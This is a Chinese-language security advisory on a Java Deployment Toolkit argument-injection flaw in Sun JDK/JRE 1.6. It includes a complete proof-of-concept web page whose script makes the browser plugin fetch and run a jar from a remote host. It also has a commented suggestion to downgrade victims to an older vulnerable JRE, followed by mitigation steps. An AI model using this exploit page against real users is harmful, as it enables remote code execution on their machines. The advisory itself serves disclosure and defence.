受影响系统:
Sun JDK 1.6.x
Sun JRE 1.6.x
描述:
Java开发工具包(Java Development Kit)用于构建在Java平台上发布的应用程序、Applet和组件的开发环境。
Java开发工具包所提供的launch()方式接受了用户提供的URL字符串并将其传送给了所注册的JNLP文件处理器(默认为Java Web Start)。由于工具包没有对URL参数执行充分的验证,用户可以通过命令行向Java Web Start提供任意参数,导致执行任意代码。
<*来源:Tavis Ormandy (taviso@gentoo.org)
链接:http://marc.info/?l=full-disclosure&m=127081170517534&w=2
http://marc.info/?l=bugtraq&m=127084530202458&w=2
http://secunia.com/advisories/39260/
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
建议:
临时解决方法:
* Internet Explorer用户可对CLSID CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA设置kill-bit。
* Mozilla Firefox和其他基于NPAPI的浏览器用户可使用文件系统ACL限制对npdeploytk.dll的访问。
厂商补丁:
Sun
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。